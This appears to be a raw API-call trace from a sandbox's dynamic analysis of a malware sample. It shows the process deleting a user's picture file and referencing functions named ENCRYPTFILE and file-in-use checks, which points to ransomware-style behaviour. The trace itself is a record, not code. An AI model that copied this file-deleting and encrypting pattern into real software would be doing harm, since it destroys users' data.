[0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0088.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.829] FreeLibrary (hLibModule=0x756e0000) returned 1 [0088.829] CloseHandle (hObject=0x298) returned 1 [0088.830] CloseHandle (hObject=0x258) returned 1 [0088.887] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp", lpFilePart=0x0) returned 0x25 [0088.887] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\i5q_5bq6.bmp")) returned 0x20 [0088.887] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789db490, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0x350e5ad0, ftLastAccessTime.dwHighDateTime=0x1d5e336, ftLastWriteTime.dwLowDateTime=0x350e5ad0, ftLastWriteTime.dwHighDateTime=0x1d5e336, nFileSizeHigh=0x0, nFileSizeLow=0x1297e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="i5q_5Bq6.bmp", cAlternateFileName="")) returned 0x41ac200 [0088.887] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\i5q_5bq6.bmp")) returned 1 [0088.927] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789db490, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0x350e5ad0, ftLastAccessTime.dwHighDateTime=0x1d5e336, ftLastWriteTime.dwLowDateTime=0x350e5ad0, ftLastWriteTime.dwHighDateTime=0x1d5e336, nFileSizeHigh=0x0, nFileSizeLow=0x1297e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="i5q_5Bq6.bmp", cAlternateFileName="")) returned 0 [0088.928] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0088.928] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2190 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0088.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ef0 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0088.929] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0088.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0088.929] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24491a80, ftCreationTime.dwHighDateTime=0x1d5e8ab, ftLastAccessTime.dwLowDateTime=0xf883cf30, ftLastAccessTime.dwHighDateTime=0x1d5eb70, ftLastWriteTime.dwLowDateTime=0xf883cf30, ftLastWriteTime.dwHighDateTime=0x1d5eb70, nFileSizeHigh=0x0, nFileSizeLow=0xd297, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="KI1iqiSuYI.jpg", cAlternateFileName="KI1IQI~1.JPG")) returned 0x41ac040 [0088.929] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0088.930] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0088.930] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0088.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0088.931] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2280 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2290 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bc0 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0088.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0088.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.932] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0088.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0088.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.975] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 